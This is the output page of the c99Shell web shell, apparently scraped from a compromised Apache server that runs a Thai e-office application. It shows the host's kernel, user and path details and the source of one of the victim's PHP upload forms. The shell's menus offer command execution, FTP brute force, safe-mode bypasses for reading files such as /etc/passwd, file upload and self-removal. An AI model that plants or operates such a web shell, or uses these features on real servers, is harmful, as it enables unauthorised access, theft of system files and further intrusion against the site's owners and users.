!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.89 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addDocSended.php (3.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="javascript" type="text/javascript">
function startUpload(){ 
      document.getElementById('f1_upload_process').style.visibility = 'visible';  
      document.getElementById('f1_upload_process').innerHTML ='.....กำลังอัพโหลดไฟล์....';
      return true;
}
function startDel(a){  
        var agree=confirm("คุณต้องการลบแฟ้มหนังสือแน่นอนใช่หรือไม่ ?");
        if (agree){
              document.getElementById('method2').value="del";
              document.getElementById('selectdel').value=a;
              document.gg.submit();  
        }else{
            return false ;
        }
}
function stopUpload(myresult,caseerror,a){
      var result = '';
      if (myresult == 'yes'){
         result = '<span >'+caseerror+'<\/span><br/><br/>'+a;
      }
      else if(myresult == 'no') {
         result = '<span ><font size=2 color=red>*** '+caseerror+' ***</font><\/span><br/><br/>'+a;
      }
      document.getElementById('f1_upload_process').style.visibility = 'hidden';
      document.getElementById('f1_upload_form').innerHTML = result;
      document.getElementById('f1_upload_form').style.visibility = 'visible';      
      return true;   
}
function setLoading(){
    document.getElementById('f1_upload_process').innerHTML = '';
}
</script> 
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<form name="gg"   action="showSelectUploadDocSended.php" method="post" enctype="multipart/form-data" onsubmit="startUpload();" target="upload_target">
<input name="DlcID" type="hidden" value=<? echo $DLCID;?>>
<input name="docpath" type="hidden" value=<? echo searchDocPath($GLOBALS["COLLEGEID"]);?>>
<input name="DocID" type="hidden" value="<?php echo $oDoc->DocID?>">
<input name="method2" type="hidden" id="method2">
<input name="selectdel" type="hidden" id="selectdel">
<table width="100%" align="center" >  
    <tr><td width="100%">
            <table width="100%" align="left" border=0><tr><td width="100%">
            <? //------------table upload file-------------------------  ?>
            </td>
                      </tr>
                <?
                            $oSys
->RSsysConfig();
                            
$oSys->GetRecord();
                            
$oSys->filesizebyte;
                            
$sizefileM=($oSys->filesizebyte/1024/1024);
                
?>
                <tr><td><div id="f1_upload_form" align="center"><? include("uploadDocSended.php"); echo manageDocAtt($DLCID,$oDoc->DocID);?></div></td></tr>
                <tr><td>
                <table width="100%"  border=1 cellpadding="0" cellspacing="0" style="border-collapse:collapse" bordercolor="#6CABF9">
                <tr>
                <td height="22">
                     <div id="f1_upload_process"></div><b>&nbsp;เพิ่มแฟ้มหนังสือเพิ่มเติม (หลังจากส่งถึงผู้รับผิดชอบแล้ว)</b>                    
                </td>
                </tr>
                <tr>
                        <td  height="75"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_20"]; ?>">
                        <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>">
                        &nbsp;คลิ๊กที่ปุ่ม 
                          "Browse.." เพื่อเลือกแฟ้ม จากนั้น<br>&nbsp;คลิ๊กที่ปุ่ม "เพิ่มแฟ้ม" 
                          เพื่อเพิ่มแฟ้มเข้าในรายการ</font> 
                          <input name="fileupload" type="file" size="30" /><input type="submit" name="submitBtn" value="เพิ่มแฟ้ม" />
                          <iframe id="upload_target" name="upload_target" src="#" style="width:0;height:0;border:0px solid #fff;"></iframe>
                  </td>
                </tr>
              </table>
                                        <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">หมายเหตุ***&nbsp;ขนาดแฟ้มไม่เกิน 
                          <? echo $sizefileM?> MB   ,ชื่อแฟ้มไม่ควรจะประกอบด้วย 
                          จุด(.) และ ,</font> 
              </td>
                      </tr></table>
    </td></tr>
</table>
</form>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0119 ]--